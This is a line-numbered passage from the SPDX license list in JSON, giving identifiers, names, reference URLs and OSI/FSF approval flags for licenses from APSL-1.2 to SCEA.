1598 "licenseId": "APSL-1.2",
1599 "seeAlso": [
1600 "http://www.samurajdata.se/opensource/mirror/licenses/apsl.php"
1601 ],
1602 "isOsiApproved": true
1603 },
1604 {
1605 "reference": "https://spdx.org/licenses/GFDL-1.2-no-invariants-only.html",
1606 "isDeprecatedLicenseId": false,
1607 "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-no-invariants-only.json",
1608 "referenceNumber": 129,
1609 "name": "GNU Free Documentation License v1.2 only - no invariants",
1610 "licenseId": "GFDL-1.2-no-invariants-only",
1611 "seeAlso": [
1612 "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
1613 ],
1614 "isOsiApproved": false
1615 },
1616 {
1617 "reference": "https://spdx.org/licenses/Artistic-2.0.html",
1618 "isDeprecatedLicenseId": false,
1619 "detailsUrl": "https://spdx.org/licenses/Artistic-2.0.json",
1620 "referenceNumber": 130,
1621 "name": "Artistic License 2.0",
1622 "licenseId": "Artistic-2.0",
1623 "seeAlso": [
1624 "http://www.perlfoundation.org/artistic_license_2_0",
1625 "https://www.perlfoundation.org/artistic-license-20.html",
1626 "https://opensource.org/licenses/artistic-license-2.0"
1627 ],
1628 "isOsiApproved": true,
1629 "isFsfLibre": true
1630 },
1631 {
1632 "reference": "https://spdx.org/licenses/GPL-2.0.html",
1633 "isDeprecatedLicenseId": true,
1634 "detailsUrl": "https://spdx.org/licenses/GPL-2.0.json",
1635 "referenceNumber": 131,
1636 "name": "GNU General Public License v2.0 only",
1637 "licenseId": "GPL-2.0",
1638 "seeAlso": [
1639 "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
1640 "https://opensource.org/licenses/GPL-2.0"
1641 ],
1642 "isOsiApproved": true,
1643 "isFsfLibre": true
1644 },
1645 {
1646 "reference": "https://spdx.org/licenses/RSCPL.html",
1647 "isDeprecatedLicenseId": false,
1648 "detailsUrl": "https://spdx.org/licenses/RSCPL.json",
1649 "referenceNumber": 132,
1650 "name": "Ricoh Source Code Public License",
1651 "licenseId": "RSCPL",
1652 "seeAlso": [
1653 "http://wayback.archive.org/web/20060715140826/http://www.risource.org/RPL/RPL-1.0A.shtml",
1654 "https://opensource.org/licenses/RSCPL"
1655 ],
1656 "isOsiApproved": true
1657 },
1658 {
1659 "reference": "https://spdx.org/licenses/Sleepycat.html",
1660 "isDeprecatedLicenseId": false,
1661 "detailsUrl": "https://spdx.org/licenses/Sleepycat.json",
1662 "referenceNumber": 133,
1663 "name": "Sleepycat License",
1664 "licenseId": "Sleepycat",
1665 "seeAlso": [
1666 "https://opensource.org/licenses/Sleepycat"
1667 ],
1668 "isOsiApproved": true,
1669 "isFsfLibre": true
1670 },
1671 {
1672 "reference": "https://spdx.org/licenses/xpp.html",
1673 "isDeprecatedLicenseId": false,
1674 "detailsUrl": "https://spdx.org/licenses/xpp.json",
1675 "referenceNumber": 134,
1676 "name": "XPP License",
1677 "licenseId": "xpp",
1678 "seeAlso": [
1679 "https://fedoraproject.org/wiki/Licensing/xpp"
1680 ],
1681 "isOsiApproved": false
1682 },
1683 {
1684 "reference": "https://spdx.org/licenses/CDLA-Sharing-1.0.html",
1685 "isDeprecatedLicenseId": false,
1686 "detailsUrl": "https://spdx.org/licenses/CDLA-Sharing-1.0.json",
1687 "referenceNumber": 135,
1688 "name": "Community Data License Agreement Sharing 1.0",
1689 "licenseId": "CDLA-Sharing-1.0",
1690 "seeAlso": [
1691 "https://cdla.io/sharing-1-0"
1692 ],
1693 "isOsiApproved": false
1694 },
1695 {
1696 "reference": "https://spdx.org/licenses/ClArtistic.html",
1697 "isDeprecatedLicenseId": false,
1698 "detailsUrl": "https://spdx.org/licenses/ClArtistic.json",
1699 "referenceNumber": 136,
1700 "name": "Clarified Artistic License",
1701 "licenseId": "ClArtistic",
1702 "seeAlso": [
1703 "http://gianluca.dellavedova.org/2011/01/03/clarified-artistic-license/",
1704 "http://www.ncftp.com/ncftp/doc/LICENSE.txt"
1705 ],
1706 "isOsiApproved": false,
1707 "isFsfLibre": true
1708 },
1709 {
1710 "reference": "https://spdx.org/licenses/AGPL-1.0-only.html",
1711 "isDeprecatedLicenseId": false,
1712 "detailsUrl": "https://spdx.org/licenses/AGPL-1.0-only.json",
1713 "referenceNumber": 137,
1714 "name": "Affero General Public License v1.0 only",
1715 "licenseId": "AGPL-1.0-only",
1716 "seeAlso": [
1717 "http://www.affero.org/oagpl.html"
1718 ],
1719 "isOsiApproved": false
1720 },
1721 {
1722 "reference": "https://spdx.org/licenses/CC-BY-3.0-DE.html",
1723 "isDeprecatedLicenseId": false,
1724 "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-DE.json",
1725 "referenceNumber": 138,
1726 "name": "Creative Commons Attribution 3.0 Germany",
1727 "licenseId": "CC-BY-3.0-DE",
1728 "seeAlso": [
1729 "https://creativecommons.org/licenses/by/3.0/de/legalcode"
1730 ],
1731 "isOsiApproved": false
1732 },
1733 {
1734 "reference": "https://spdx.org/licenses/AFL-2.0.html",
1735 "isDeprecatedLicenseId": false,
1736 "detailsUrl": "https://spdx.org/licenses/AFL-2.0.json",
1737 "referenceNumber": 139,
1738 "name": "Academic Free License v2.0",
1739 "licenseId": "AFL-2.0",
1740 "seeAlso": [
1741 "http://wayback.archive.org/web/20060924134533/http://www.opensource.org/licenses/afl-2.0.txt"
1742 ],
1743 "isOsiApproved": true,
1744 "isFsfLibre": true
1745 },
1746 {
1747 "reference": "https://spdx.org/licenses/Intel.html",
1748 "isDeprecatedLicenseId": false,
1749 "detailsUrl": "https://spdx.org/licenses/Intel.json",
1750 "referenceNumber": 140,
1751 "name": "Intel Open Source License",
1752 "licenseId": "Intel",
1753 "seeAlso": [
1754 "https://opensource.org/licenses/Intel"
1755 ],
1756 "isOsiApproved": true,
1757 "isFsfLibre": true
1758 },
1759 {
1760 "reference": "https://spdx.org/licenses/GFDL-1.1-no-invariants-or-later.html",
1761 "isDeprecatedLicenseId": false,
1762 "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-no-invariants-or-later.json",
1763 "referenceNumber": 141,
1764 "name": "GNU Free Documentation License v1.1 or later - no invariants",
1765 "licenseId": "GFDL-1.1-no-invariants-or-later",
1766 "seeAlso": [
1767 "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
1768 ],
1769 "isOsiApproved": false
1770 },
1771 {
1772 "reference": "https://spdx.org/licenses/APAFML.html",
1773 "isDeprecatedLicenseId": false,
1774 "detailsUrl": "https://spdx.org/licenses/APAFML.json",
1775 "referenceNumber": 142,
1776 "name": "Adobe Postscript AFM License",
1777 "licenseId": "APAFML",
1778 "seeAlso": [
1779 "https://fedoraproject.org/wiki/Licensing/AdobePostscriptAFM"
1780 ],
1781 "isOsiApproved": false
1782 },
1783 {
1784 "reference": "https://spdx.org/licenses/GFDL-1.2.html",
1785 "isDeprecatedLicenseId": true,
1786 "detailsUrl": "https://spdx.org/licenses/GFDL-1.2.json",
1787 "referenceNumber": 143,
1788 "name": "GNU Free Documentation License v1.2",
1789 "licenseId": "GFDL-1.2",
1790 "seeAlso": [
1791 "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
1792 ],
1793 "isOsiApproved": false,
1794 "isFsfLibre": true
1795 },
1796 {
1797 "reference": "https://spdx.org/licenses/SISSL.html",
1798 "isDeprecatedLicenseId": false,
1799 "detailsUrl": "https://spdx.org/licenses/SISSL.json",
1800 "referenceNumber": 144,
1801 "name": "Sun Industry Standards Source License v1.1",
1802 "licenseId": "SISSL",
1803 "seeAlso": [
1804 "http://www.openoffice.org/licenses/sissl_license.html",
1805 "https://opensource.org/licenses/SISSL"
1806 ],
1807 "isOsiApproved": true,
1808 "isFsfLibre": true
1809 },
1810 {
1811 "reference": "https://spdx.org/licenses/Naumen.html",
1812 "isDeprecatedLicenseId": false,
1813 "detailsUrl": "https://spdx.org/licenses/Naumen.json",
1814 "referenceNumber": 145,
1815 "name": "Naumen Public License",
1816 "licenseId": "Naumen",
1817 "seeAlso": [
1818 "https://opensource.org/licenses/Naumen"
1819 ],
1820 "isOsiApproved": true
1821 },
1822 {
1823 "reference": "https://spdx.org/licenses/HTMLTIDY.html",
1824 "isDeprecatedLicenseId": false,
1825 "detailsUrl": "https://spdx.org/licenses/HTMLTIDY.json",
1826 "referenceNumber": 146,
1827 "name": "HTML Tidy License",
1828 "licenseId": "HTMLTIDY",
1829 "seeAlso": [
1830 "https://github.com/htacg/tidy-html5/blob/next/README/LICENSE.md"
1831 ],
1832 "isOsiApproved": false
1833 },
1834 {
1835 "reference": "https://spdx.org/licenses/OLDAP-2.8.html",
1836 "isDeprecatedLicenseId": false,
1837 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.8.json",
1838 "referenceNumber": 147,
1839 "name": "Open LDAP Public License v2.8",
1840 "licenseId": "OLDAP-2.8",
1841 "seeAlso": [
1842 "http://www.openldap.org/software/release/license.html"
1843 ],
1844 "isOsiApproved": true
1845 },
1846 {
1847 "reference": "https://spdx.org/licenses/blessing.html",
1848 "isDeprecatedLicenseId": false,
1849 "detailsUrl": "https://spdx.org/licenses/blessing.json",
1850 "referenceNumber": 148,
1851 "name": "SQLite Blessing",
1852 "licenseId": "blessing",
1853 "seeAlso": [
1854 "https://www.sqlite.org/src/artifact/e33a4df7e32d742a?ln\u003d4-9",
1855 "https://sqlite.org/src/artifact/df5091916dbb40e6"
1856 ],
1857 "isOsiApproved": false
1858 },
1859 {
1860 "reference": "https://spdx.org/licenses/CC-BY-ND-2.0.html",
1861 "isDeprecatedLicenseId": false,
1862 "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-2.0.json",
1863 "referenceNumber": 149,
1864 "name": "Creative Commons Attribution No Derivatives 2.0 Generic",
1865 "licenseId": "CC-BY-ND-2.0",
1866 "seeAlso": [
1867 "https://creativecommons.org/licenses/by-nd/2.0/legalcode"
1868 ],
1869 "isOsiApproved": false
1870 },
1871 {
1872 "reference": "https://spdx.org/licenses/OGTSL.html",
1873 "isDeprecatedLicenseId": false,
1874 "detailsUrl": "https://spdx.org/licenses/OGTSL.json",
1875 "referenceNumber": 150,
1876 "name": "Open Group Test Suite License",
1877 "licenseId": "OGTSL",
1878 "seeAlso": [
1879 "http://www.opengroup.org/testing/downloads/The_Open_Group_TSL.txt",
1880 "https://opensource.org/licenses/OGTSL"
1881 ],
1882 "isOsiApproved": true
1883 },
1884 {
1885 "reference": "https://spdx.org/licenses/LGPL-2.0-or-later.html",
1886 "isDeprecatedLicenseId": false,
1887 "detailsUrl": "https://spdx.org/licenses/LGPL-2.0-or-later.json",
1888 "referenceNumber": 151,
1889 "name": "GNU Library General Public License v2 or later",
1890 "licenseId": "LGPL-2.0-or-later",
1891 "seeAlso": [
1892 "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
1893 ],
1894 "isOsiApproved": true
1895 },
1896 {
1897 "reference": "https://spdx.org/licenses/Parity-7.0.0.html",
1898 "isDeprecatedLicenseId": false,
1899 "detailsUrl": "https://spdx.org/licenses/Parity-7.0.0.json",
1900 "referenceNumber": 152,
1901 "name": "The Parity Public License 7.0.0",
1902 "licenseId": "Parity-7.0.0",
1903 "seeAlso": [
1904 "https://paritylicense.com/versions/7.0.0.html"
1905 ],
1906 "isOsiApproved": false
1907 },
1908 {
1909 "reference": "https://spdx.org/licenses/CC-BY-ND-1.0.html",
1910 "isDeprecatedLicenseId": false,
1911 "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-1.0.json",
1912 "referenceNumber": 153,
1913 "name": "Creative Commons Attribution No Derivatives 1.0 Generic",
1914 "licenseId": "CC-BY-ND-1.0",
1915 "seeAlso": [
1916 "https://creativecommons.org/licenses/by-nd/1.0/legalcode"
1917 ],
1918 "isOsiApproved": false
1919 },
1920 {
1921 "reference": "https://spdx.org/licenses/dvipdfm.html",
1922 "isDeprecatedLicenseId": false,
1923 "detailsUrl": "https://spdx.org/licenses/dvipdfm.json",
1924 "referenceNumber": 154,
1925 "name": "dvipdfm License",
1926 "licenseId": "dvipdfm",
1927 "seeAlso": [
1928 "https://fedoraproject.org/wiki/Licensing/dvipdfm"
1929 ],
1930 "isOsiApproved": false
1931 },
1932 {
1933 "reference": "https://spdx.org/licenses/CNRI-Python.html",
1934 "isDeprecatedLicenseId": false,
1935 "detailsUrl": "https://spdx.org/licenses/CNRI-Python.json",
1936 "referenceNumber": 155,
1937 "name": "CNRI Python License",
1938 "licenseId": "CNRI-Python",
1939 "seeAlso": [
1940 "https://opensource.org/licenses/CNRI-Python"
1941 ],
1942 "isOsiApproved": true
1943 },
1944 {
1945 "reference": "https://spdx.org/licenses/BSD-4-Clause-UC.html",
1946 "isDeprecatedLicenseId": false,
1947 "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause-UC.json",
1948 "referenceNumber": 156,
1949 "name": "BSD-4-Clause (University of California-Specific)",
1950 "licenseId": "BSD-4-Clause-UC",
1951 "seeAlso": [
1952 "http://www.freebsd.org/copyright/license.html"
1953 ],
1954 "isOsiApproved": false
1955 },
1956 {
1957 "reference": "https://spdx.org/licenses/NLOD-1.0.html",
1958 "isDeprecatedLicenseId": false,
1959 "detailsUrl": "https://spdx.org/licenses/NLOD-1.0.json",
1960 "referenceNumber": 157,
1961 "name": "Norwegian Licence for Open Government Data (NLOD) 1.0",
1962 "licenseId": "NLOD-1.0",
1963 "seeAlso": [
1964 "http://data.norge.no/nlod/en/1.0"
1965 ],
1966 "isOsiApproved": false
1967 },
1968 {
1969 "reference": "https://spdx.org/licenses/MS-RL.html",
1970 "isDeprecatedLicenseId": false,
1971 "detailsUrl": "https://spdx.org/licenses/MS-RL.json",
1972 "referenceNumber": 158,
1973 "name": "Microsoft Reciprocal License",
1974 "licenseId": "MS-RL",
1975 "seeAlso": [
1976 "http://www.microsoft.com/opensource/licenses.mspx",
1977 "https://opensource.org/licenses/MS-RL"
1978 ],
1979 "isOsiApproved": true,
1980 "isFsfLibre": true
1981 },
1982 {
1983 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-4.0.html",
1984 "isDeprecatedLicenseId": false,
1985 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-4.0.json",
1986 "referenceNumber": 159,
1987 "name": "Creative Commons Attribution Non Commercial Share Alike 4.0 International",
1988 "licenseId": "CC-BY-NC-SA-4.0",
1989 "seeAlso": [
1990 "https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode"
1991 ],
1992 "isOsiApproved": false
1993 },
1994 {
1995 "reference": "https://spdx.org/licenses/HaskellReport.html",
1996 "isDeprecatedLicenseId": false,
1997 "detailsUrl": "https://spdx.org/licenses/HaskellReport.json",
1998 "referenceNumber": 160,
1999 "name": "Haskell Language Report License",
2000 "licenseId": "HaskellReport",
2001 "seeAlso": [
2002 "https://fedoraproject.org/wiki/Licensing/Haskell_Language_Report_License"
2003 ],
2004 "isOsiApproved": false
2005 },
2006 {
2007 "reference": "https://spdx.org/licenses/CC-BY-1.0.html",
2008 "isDeprecatedLicenseId": false,
2009 "detailsUrl": "https://spdx.org/licenses/CC-BY-1.0.json",
2010 "referenceNumber": 161,
2011 "name": "Creative Commons Attribution 1.0 Generic",
2012 "licenseId": "CC-BY-1.0",
2013 "seeAlso": [
2014 "https://creativecommons.org/licenses/by/1.0/legalcode"
2015 ],
2016 "isOsiApproved": false
2017 },
2018 {
2019 "reference": "https://spdx.org/licenses/UCL-1.0.html",
2020 "isDeprecatedLicenseId": false,
2021 "detailsUrl": "https://spdx.org/licenses/UCL-1.0.json",
2022 "referenceNumber": 162,
2023 "name": "Upstream Compatibility License v1.0",
2024 "licenseId": "UCL-1.0",
2025 "seeAlso": [
2026 "https://opensource.org/licenses/UCL-1.0"
2027 ],
2028 "isOsiApproved": true
2029 },
2030 {
2031 "reference": "https://spdx.org/licenses/Mup.html",
2032 "isDeprecatedLicenseId": false,
2033 "detailsUrl": "https://spdx.org/licenses/Mup.json",
2034 "referenceNumber": 163,
2035 "name": "Mup License",
2036 "licenseId": "Mup",
2037 "seeAlso": [
2038 "https://fedoraproject.org/wiki/Licensing/Mup"
2039 ],
2040 "isOsiApproved": false
2041 },
2042 {
2043 "reference": "https://spdx.org/licenses/SMPPL.html",
2044 "isDeprecatedLicenseId": false,
2045 "detailsUrl": "https://spdx.org/licenses/SMPPL.json",
2046 "referenceNumber": 164,
2047 "name": "Secure Messaging Protocol Public License",
2048 "licenseId": "SMPPL",
2049 "seeAlso": [
2050 "https://github.com/dcblake/SMP/blob/master/Documentation/License.txt"
2051 ],
2052 "isOsiApproved": false
2053 },
2054 {
2055 "reference": "https://spdx.org/licenses/PHP-3.0.html",
2056 "isDeprecatedLicenseId": false,
2057 "detailsUrl": "https://spdx.org/licenses/PHP-3.0.json",
2058 "referenceNumber": 165,
2059 "name": "PHP License v3.0",
2060 "licenseId": "PHP-3.0",
2061 "seeAlso": [
2062 "http://www.php.net/license/3_0.txt",
2063 "https://opensource.org/licenses/PHP-3.0"
2064 ],
2065 "isOsiApproved": true
2066 },
2067 {
2068 "reference": "https://spdx.org/licenses/GL2PS.html",
2069 "isDeprecatedLicenseId": false,
2070 "detailsUrl": "https://spdx.org/licenses/GL2PS.json",
2071 "referenceNumber": 166,
2072 "name": "GL2PS License",
2073 "licenseId": "GL2PS",
2074 "seeAlso": [
2075 "http://www.geuz.org/gl2ps/COPYING.GL2PS"
2076 ],
2077 "isOsiApproved": false
2078 },
2079 {
2080 "reference": "https://spdx.org/licenses/CrystalStacker.html",
2081 "isDeprecatedLicenseId": false,
2082 "detailsUrl": "https://spdx.org/licenses/CrystalStacker.json",
2083 "referenceNumber": 167,
2084 "name": "CrystalStacker License",
2085 "licenseId": "CrystalStacker",
2086 "seeAlso": [
2087 "https://fedoraproject.org/wiki/Licensing:CrystalStacker?rd\u003dLicensing/CrystalStacker"
2088 ],
2089 "isOsiApproved": false
2090 },
2091 {
2092 "reference": "https://spdx.org/licenses/W3C-20150513.html",
2093 "isDeprecatedLicenseId": false,
2094 "detailsUrl": "https://spdx.org/licenses/W3C-20150513.json",
2095 "referenceNumber": 168,
2096 "name": "W3C Software Notice and Document License (2015-05-13)",
2097 "licenseId": "W3C-20150513",
2098 "seeAlso": [
2099 "https://www.w3.org/Consortium/Legal/2015/copyright-software-and-document"
2100 ],
2101 "isOsiApproved": false
2102 },
2103 {
2104 "reference": "https://spdx.org/licenses/NIST-PD-fallback.html",
2105 "isDeprecatedLicenseId": false,
2106 "detailsUrl": "https://spdx.org/licenses/NIST-PD-fallback.json",
2107 "referenceNumber": 169,
2108 "name": "NIST Public Domain Notice with license fallback",
2109 "licenseId": "NIST-PD-fallback",
2110 "seeAlso": [
2111 "https://github.com/usnistgov/jsip/blob/59700e6926cbe96c5cdae897d9a7d2656b42abe3/LICENSE",
2112 "https://github.com/usnistgov/fipy/blob/86aaa5c2ba2c6f1be19593c5986071cf6568cc34/LICENSE.rst"
2113 ],
2114 "isOsiApproved": false
2115 },
2116 {
2117 "reference": "https://spdx.org/licenses/OGL-UK-1.0.html",
2118 "isDeprecatedLicenseId": false,
2119 "detailsUrl": "https://spdx.org/licenses/OGL-UK-1.0.json",
2120 "referenceNumber": 170,
2121 "name": "Open Government Licence v1.0",
2122 "licenseId": "OGL-UK-1.0",
2123 "seeAlso": [
2124 "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/1/"
2125 ],
2126 "isOsiApproved": false
2127 },
2128 {
2129 "reference": "https://spdx.org/licenses/CPL-1.0.html",
2130 "isDeprecatedLicenseId": false,
2131 "detailsUrl": "https://spdx.org/licenses/CPL-1.0.json",
2132 "referenceNumber": 171,
2133 "name": "Common Public License 1.0",
2134 "licenseId": "CPL-1.0",
2135 "seeAlso": [
2136 "https://opensource.org/licenses/CPL-1.0"
2137 ],
2138 "isOsiApproved": true,
2139 "isFsfLibre": true
2140 },
2141 {
2142 "reference": "https://spdx.org/licenses/LGPL-2.1-only.html",
2143 "isDeprecatedLicenseId": false,
2144 "detailsUrl": "https://spdx.org/licenses/LGPL-2.1-only.json",
2145 "referenceNumber": 172,
2146 "name": "GNU Lesser General Public License v2.1 only",
2147 "licenseId": "LGPL-2.1-only",
2148 "seeAlso": [
2149 "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
2150 "https://opensource.org/licenses/LGPL-2.1"
2151 ],
2152 "isOsiApproved": true,
2153 "isFsfLibre": true
2154 },
2155 {
2156 "reference": "https://spdx.org/licenses/ZPL-2.0.html",
2157 "isDeprecatedLicenseId": false,
2158 "detailsUrl": "https://spdx.org/licenses/ZPL-2.0.json",
2159 "referenceNumber": 173,
2160 "name": "Zope Public License 2.0",
2161 "licenseId": "ZPL-2.0",
2162 "seeAlso": [
2163 "http://old.zope.org/Resources/License/ZPL-2.0",
2164 "https://opensource.org/licenses/ZPL-2.0"
2165 ],
2166 "isOsiApproved": true,
2167 "isFsfLibre": true
2168 },
2169 {
2170 "reference": "https://spdx.org/licenses/Frameworx-1.0.html",
2171 "isDeprecatedLicenseId": false,
2172 "detailsUrl": "https://spdx.org/licenses/Frameworx-1.0.json",
2173 "referenceNumber": 174,
2174 "name": "Frameworx Open License 1.0",
2175 "licenseId": "Frameworx-1.0",
2176 "seeAlso": [
2177 "https://opensource.org/licenses/Frameworx-1.0"
2178 ],
2179 "isOsiApproved": true
2180 },
2181 {
2182 "reference": "https://spdx.org/licenses/AGPL-3.0-only.html",
2183 "isDeprecatedLicenseId": false,
2184 "detailsUrl": "https://spdx.org/licenses/AGPL-3.0-only.json",
2185 "referenceNumber": 175,
2186 "name": "GNU Affero General Public License v3.0 only",
2187 "licenseId": "AGPL-3.0-only",
2188 "seeAlso": [
2189 "https://www.gnu.org/licenses/agpl.txt",
2190 "https://opensource.org/licenses/AGPL-3.0"
2191 ],
2192 "isOsiApproved": true,
2193 "isFsfLibre": true
2194 },
2195 {
2196 "reference": "https://spdx.org/licenses/DRL-1.0.html",
2197 "isDeprecatedLicenseId": false,
2198 "detailsUrl": "https://spdx.org/licenses/DRL-1.0.json",
2199 "referenceNumber": 176,
2200 "name": "Detection Rule License 1.0",
2201 "licenseId": "DRL-1.0",
2202 "seeAlso": [
2203 "https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md"
2204 ],
2205 "isOsiApproved": false
2206 },
2207 {
2208 "reference": "https://spdx.org/licenses/EFL-2.0.html",
2209 "isDeprecatedLicenseId": false,
2210 "detailsUrl": "https://spdx.org/licenses/EFL-2.0.json",
2211 "referenceNumber": 177,
2212 "name": "Eiffel Forum License v2.0",
2213 "licenseId": "EFL-2.0",
2214 "seeAlso": [
2215 "http://www.eiffel-nice.org/license/eiffel-forum-license-2.html",
2216 "https://opensource.org/licenses/EFL-2.0"
2217 ],
2218 "isOsiApproved": true,
2219 "isFsfLibre": true
2220 },
2221 {
2222 "reference": "https://spdx.org/licenses/Spencer-99.html",
2223 "isDeprecatedLicenseId": false,
2224 "detailsUrl": "https://spdx.org/licenses/Spencer-99.json",
2225 "referenceNumber": 178,
2226 "name": "Spencer License 99",
2227 "licenseId": "Spencer-99",
2228 "seeAlso": [
2229 "http://www.opensource.apple.com/source/tcl/tcl-5/tcl/generic/regfronts.c"
2230 ],
2231 "isOsiApproved": false
2232 },
2233 {
2234 "reference": "https://spdx.org/licenses/CAL-1.0-Combined-Work-Exception.html",
2235 "isDeprecatedLicenseId": false,
2236 "detailsUrl": "https://spdx.org/licenses/CAL-1.0-Combined-Work-Exception.json",
2237 "referenceNumber": 179,
2238 "name": "Cryptographic Autonomy License 1.0 (Combined Work Exception)",
2239 "licenseId": "CAL-1.0-Combined-Work-Exception",
2240 "seeAlso": [
2241 "http://cryptographicautonomylicense.com/license-text.html",
2242 "https://opensource.org/licenses/CAL-1.0"
2243 ],
2244 "isOsiApproved": true
2245 },
2246 {
2247 "reference": "https://spdx.org/licenses/GFDL-1.1-invariants-only.html",
2248 "isDeprecatedLicenseId": false,
2249 "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-invariants-only.json",
2250 "referenceNumber": 180,
2251 "name": "GNU Free Documentation License v1.1 only - invariants",
2252 "licenseId": "GFDL-1.1-invariants-only",
2253 "seeAlso": [
2254 "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
2255 ],
2256 "isOsiApproved": false
2257 },
2258 {
2259 "reference": "https://spdx.org/licenses/TCL.html",
2260 "isDeprecatedLicenseId": false,
2261 "detailsUrl": "https://spdx.org/licenses/TCL.json",
2262 "referenceNumber": 181,
2263 "name": "TCL/TK License",
2264 "licenseId": "TCL",
2265 "seeAlso": [
2266 "http://www.tcl.tk/software/tcltk/license.html",
2267 "https://fedoraproject.org/wiki/Licensing/TCL"
2268 ],
2269 "isOsiApproved": false
2270 },
2271 {
2272 "reference": "https://spdx.org/licenses/SHL-0.5.html",
2273 "isDeprecatedLicenseId": false,
2274 "detailsUrl": "https://spdx.org/licenses/SHL-0.5.json",
2275 "referenceNumber": 182,
2276 "name": "Solderpad Hardware License v0.5",
2277 "licenseId": "SHL-0.5",
2278 "seeAlso": [
2279 "https://solderpad.org/licenses/SHL-0.5/"
2280 ],
2281 "isOsiApproved": false
2282 },
2283 {
2284 "reference": "https://spdx.org/licenses/OFL-1.0-RFN.html",
2285 "isDeprecatedLicenseId": false,
2286 "detailsUrl": "https://spdx.org/licenses/OFL-1.0-RFN.json",
2287 "referenceNumber": 183,
2288 "name": "SIL Open Font License 1.0 with Reserved Font Name",
2289 "licenseId": "OFL-1.0-RFN",
2290 "seeAlso": [
2291 "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
2292 ],
2293 "isOsiApproved": false
2294 },
2295 {
2296 "reference": "https://spdx.org/licenses/LGPL-2.0.html",
2297 "isDeprecatedLicenseId": true,
2298 "detailsUrl": "https://spdx.org/licenses/LGPL-2.0.json",
2299 "referenceNumber": 184,
2300 "name": "GNU Library General Public License v2 only",
2301 "licenseId": "LGPL-2.0",
2302 "seeAlso": [
2303 "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
2304 ],
2305 "isOsiApproved": true
2306 },
2307 {
2308 "reference": "https://spdx.org/licenses/CERN-OHL-W-2.0.html",
2309 "isDeprecatedLicenseId": false,
2310 "detailsUrl": "https://spdx.org/licenses/CERN-OHL-W-2.0.json",
2311 "referenceNumber": 185,
2312 "name": "CERN Open Hardware Licence Version 2 - Weakly Reciprocal",
2313 "licenseId": "CERN-OHL-W-2.0",
2314 "seeAlso": [
2315 "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
2316 ],
2317 "isOsiApproved": true
2318 },
2319 {
2320 "reference": "https://spdx.org/licenses/Glide.html",
2321 "isDeprecatedLicenseId": false,
2322 "detailsUrl": "https://spdx.org/licenses/Glide.json",
2323 "referenceNumber": 186,
2324 "name": "3dfx Glide License",
2325 "licenseId": "Glide",
2326 "seeAlso": [
2327 "http://www.users.on.net/~triforce/glidexp/COPYING.txt"
2328 ],
2329 "isOsiApproved": false
2330 },
2331 {
2332 "reference": "https://spdx.org/licenses/mpich2.html",
2333 "isDeprecatedLicenseId": false,
2334 "detailsUrl": "https://spdx.org/licenses/mpich2.json",
2335 "referenceNumber": 187,
2336 "name": "mpich2 License",
2337 "licenseId": "mpich2",
2338 "seeAlso": [
2339 "https://fedoraproject.org/wiki/Licensing/MIT"
2340 ],
2341 "isOsiApproved": false
2342 },
2343 {
2344 "reference": "https://spdx.org/licenses/psutils.html",
2345 "isDeprecatedLicenseId": false,
2346 "detailsUrl": "https://spdx.org/licenses/psutils.json",
2347 "referenceNumber": 188,
2348 "name": "psutils License",
2349 "licenseId": "psutils",
2350 "seeAlso": [
2351 "https://fedoraproject.org/wiki/Licensing/psutils"
2352 ],
2353 "isOsiApproved": false
2354 },
2355 {
2356 "reference": "https://spdx.org/licenses/SPL-1.0.html",
2357 "isDeprecatedLicenseId": false,
2358 "detailsUrl": "https://spdx.org/licenses/SPL-1.0.json",
2359 "referenceNumber": 189,
2360 "name": "Sun Public License v1.0",
2361 "licenseId": "SPL-1.0",
2362 "seeAlso": [
2363 "https://opensource.org/licenses/SPL-1.0"
2364 ],
2365 "isOsiApproved": true,
2366 "isFsfLibre": true
2367 },
2368 {
2369 "reference": "https://spdx.org/licenses/Apache-1.1.html",
2370 "isDeprecatedLicenseId": false,
2371 "detailsUrl": "https://spdx.org/licenses/Apache-1.1.json",
2372 "referenceNumber": 190,
2373 "name": "Apache License 1.1",
2374 "licenseId": "Apache-1.1",
2375 "seeAlso": [
2376 "http://apache.org/licenses/LICENSE-1.1",
2377 "https://opensource.org/licenses/Apache-1.1"
2378 ],
2379 "isOsiApproved": true,
2380 "isFsfLibre": true
2381 },
2382 {
2383 "reference": "https://spdx.org/licenses/CC-BY-ND-4.0.html",
2384 "isDeprecatedLicenseId": false,
2385 "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-4.0.json",
2386 "referenceNumber": 191,
2387 "name": "Creative Commons Attribution No Derivatives 4.0 International",
2388 "licenseId": "CC-BY-ND-4.0",
2389 "seeAlso": [
2390 "https://creativecommons.org/licenses/by-nd/4.0/legalcode"
2391 ],
2392 "isOsiApproved": false
2393 },
2394 {
2395 "reference": "https://spdx.org/licenses/FreeBSD-DOC.html",
2396 "isDeprecatedLicenseId": false,
2397 "detailsUrl": "https://spdx.org/licenses/FreeBSD-DOC.json",
2398 "referenceNumber": 192,
2399 "name": "FreeBSD Documentation License",
2400 "licenseId": "FreeBSD-DOC",
2401 "seeAlso": [
2402 "https://www.freebsd.org/copyright/freebsd-doc-license/"
2403 ],
2404 "isOsiApproved": false
2405 },
2406 {
2407 "reference": "https://spdx.org/licenses/SCEA.html",
2408 "isDeprecatedLicenseId": false,
